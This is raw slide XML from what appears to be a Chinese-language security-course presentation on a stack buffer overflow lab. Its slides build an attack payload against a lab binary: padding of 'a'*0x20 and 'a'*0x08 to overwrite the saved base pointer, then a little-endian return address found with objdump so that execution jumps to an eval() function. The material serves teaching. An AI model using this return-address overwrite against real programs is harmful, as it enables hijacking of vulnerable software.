              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B65BB02-2AEA-0A4E-8426-4CE5C0F7C0D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737752" y="2224544"/>
            <a:ext cx="1908267" cy="11642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aaaaaaaaaaaaaaaaaaaaaaaaaa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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F28E8A-6B31-4C41-80E0-305492F85CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9189657" y="4009602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Return</a:t>
            </a:r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Address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1" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB93B8C-E146-B843-8054-89D856A332AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204175" y="2265625"/>
            <a:ext cx="1908267" cy="1187791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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x20]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2" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFE45A0-CFB8-BC45-96C0-352E5CC49BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204175" y="3515314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Saved BP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x08]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4492C7D9-D3DC-A946-97A6-7DCFE0A46DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8500671" y="4192296"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7751873D-F4DD-4045-A55E-B4C9AC6FAEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8483674" y="3740771"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6403FB1-7F7D-E14F-A1B3-F10F24630E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8522860" y="3233448"/>
            <a:ext cx="638710" cy="12838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3079D3D-A043-4C45-AED9-B43795ABB16A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179629" y="4041131"/>
            <a:ext cx="4470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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>首先</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 先放 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>”a”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>再放</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>“a”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x08</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>蓋掉</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr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CCE2CD00-5B4A-524E-A5A8-1374055E66D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4749932" y="3429000"/>
            <a:ext cx="1905780" cy="11091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9630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956D746-EA77-0348-B9CE-BF91898A7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328" y="1700428"/>
            <a:ext cx="4470400" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B03E38FA-F6ED-554E-A60E-E22C2317050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2507672" y="3382513"/>
            <a:ext cx="292939" cy="4639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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C63D36-ACA4-FF4B-B744-C59754E37D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655712" y="1420832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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B335B3-50E7-9A4D-B5EB-15804EF9AD04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6867530" y="1359467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98E4D1F-ACA1-044D-9CF8-98A3F88BDC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741061" y="4438070"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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68C7739-4FD4-1140-90BA-364990ED6AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741060" y="3949876"/>
            <a:ext cx="1908267" cy="4323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要蓋的地方</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000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18" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023E0228-B9A7-E141-A97B-5F0F9B43266D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737753" y="3456579"/>
            <a:ext cx="1908267" cy="4323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err="1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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF000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9" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B65BB02-2AEA-0A4E-8426-4CE5C0F7C0D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737752" y="2224544"/>
            <a:ext cx="1908267" cy="11642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aaaaaaaaaaaaaaaaaaaaaaaaaa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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F28E8A-6B31-4C41-80E0-305492F85CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9189657" y="4009602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Return</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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Address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1" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB93B8C-E146-B843-8054-89D856A332AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204175" y="2265625"/>
            <a:ext cx="1908267" cy="1187791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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x20]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2" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFE45A0-CFB8-BC45-96C0-352E5CC49BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204175" y="3515314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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4492C7D9-D3DC-A946-97A6-7DCFE0A46DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8500671" y="4192296"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7751873D-F4DD-4045-A55E-B4C9AC6FAEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8483674" y="3740771"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6403FB1-7F7D-E14F-A1B3-F10F24630E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8522860" y="3233448"/>
            <a:ext cx="638710" cy="12838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3079D3D-A043-4C45-AED9-B43795ABB16A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179629" y="4041131"/>
            <a:ext cx="447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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>再來我們想要跳到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>位子</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr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CCE2CD00-5B4A-524E-A5A8-1374055E66D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5257728" y="4225797"/>
            <a:ext cx="1284245" cy="15646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9775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01D09E-1DB3-4548-B098-06E44BC7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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -d ./lab3.out </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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55B6068-1C99-7743-BD4B-376DEE5AD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00C4146-A0EB-6E45-91A7-DF5280280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66" y="1930400"/>
            <a:ext cx="8750300" cy="3365500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD0C821-C077-2B43-B225-A48A2748EF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615066" y="1878880"/>
            <a:ext cx="3000970" cy="281709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rgbClr val="F03B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3529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9397F4-0427-F041-A091-9903659D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因 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>底下是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>little-endian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所以填入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時，需要反過來來填入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ED2FBA-4CAE-1946-99CB-0E59FE8F5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假設要填入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>0x00400716 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>就需要填入 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>\x16\x07\x40\x00\x00\x00\x00\x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>後面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>是為了補完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>[0x08]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800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endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BFA0C7-D727-314C-AC8E-3EE70DEB764B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7057936" y="2025026"/>
            <a:ext cx="2078966" cy="40163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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE0BAAB-DC03-1648-8EDF-B7C641C1315D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269754" y="1963661"/>
            <a:ext cx="1655330" cy="4451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正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6708C5-3CC3-474A-B8FC-637914E6DB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143285" y="5303813"/>
            <a:ext cx="1908265" cy="640066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Ｍ</a:t>
            </a:r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ain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Stack</a:t>
            </a:r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Frame</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D713152-C923-BE44-A299-B3C8D381662A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139975" y="4200044"/>
            <a:ext cx="1908267" cy="109374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\x16\x07\x40\x00\x00\x00\x00\x00</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6A42BC-1A42-3444-8250-6DF3A842B42A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139976" y="3716309"/>
            <a:ext cx="1908267" cy="4323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aaaaaaaaaaaaa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9" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264369A0-672A-2F41-9E29-E45492636DF5}"/>
              </a:ext>
